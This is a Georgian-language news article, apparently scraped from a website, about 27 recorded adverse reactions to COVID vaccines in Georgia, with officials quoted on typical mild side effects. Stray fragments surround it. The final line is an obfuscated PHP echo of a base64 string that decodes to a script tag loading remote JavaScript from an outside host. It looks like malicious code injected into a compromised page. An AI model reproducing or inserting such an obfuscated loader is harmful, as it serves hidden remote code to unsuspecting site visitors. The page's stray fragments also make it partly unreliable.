celsiusi
ავერსი შნაიდერი
საქართველოში ვაქცინირებული ადამიანებიდან 27-ს გვერდითი მოვლენები ან რეაქცია გამოუვლინდა. როგორც დაავადებათა კონტროლის ეროვნული ცენტრის გადამდებ დაავადებათა ცენტრის ხელმძღვანელმა ხათუნა ზახაშვილმა „ინტერპრესნიუსის“ შეკითხვის საპასუხოდ განმარტა, მათგან 4 შემთხვევაში ინტენსიური თერაპია გახდა საჭირო, 3 შემთხვევაში ჰოსპიტალიზაცია, ხოლო 2 შემთხვევაში რეანიმაციაში გადაყვანა.
 
„გვერდითი მოვლენები და რეაქციები ვაქცინაციის შემდეგ ადამიანს შეიძლება ჰქონდეს, მათ შორის განსაკუთრებულ ყურადღებას საჭიროებს რამდენიმე გვერდითი მოვლენა და რეაქცია. საქართველოში ვაქცინირებულებიდან ჯერჯერობით რეგისტრირებული გვაქვს ასეთი 27 შემთხვევა, მათგან 4 შემთხვევა იყო, როდესაც დასჭირდათ ინტენსიური თერაპია, 3 შემთხვევაში დასჭირდათ ჰოსპიტალიზაცია, ხოლო 2 შემთხვევაში რეანიმაციული ღონისძიება“, - განაცხადა ზახაშვილმა.
 
ამავე საკითხზე ისაუბრა ასევე დაავადებათა კონტროლის ეროვნული ცენტრის ხელმძღვანელმაც. ამირან გამყრელიძის განცხადებით, ვაქცინაციიდან 1-2 დღის განმავლობაში შესაძლოა დაფიქსირდეს ტემპერატურის მატება, კუნთების, სახსრების ტკივილი, დაღლილობა, ინექციის ადგილზე სიწითლე და სხვ.
 
„ზოგადად, კოვიდ ვაქცინებზე გვერდითი მოვლენები უფრო ხშირია 1-2 დღის განმავლობაში, ვიდრე იმ კალენდარულ ვაქცინებზე, რასაც ბავშვთა ასაკში ვიყენებთ. ის სხვადასხვა ვაქცინაზე მერყეობს დაახლოებით 5%-დან 60%-ის ფარგლებში, რომელიც არის შედარებით მსუბუქი. მხედველობაში მაქვს ტემპერატურის მომატება 38 ნახევრამდე, იშვიათ შემთხვევაში შესაძლოა მეტიც. შესაძლოა ასევე იყოს კუნთების, სახსრების ტკივილი, თავის ტკივილი, დაღლილობა, ინექციის ადგილზე სიწითლე. უნდა ვიცოდეთ, რომ კოვიდ ვაქცინაციის შემდგომი 2 დღის განმავლობაში შესაძლოა ეს დისკომფორტი იყოს“,- განაცხადა გამყრელიძემ.
2810
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");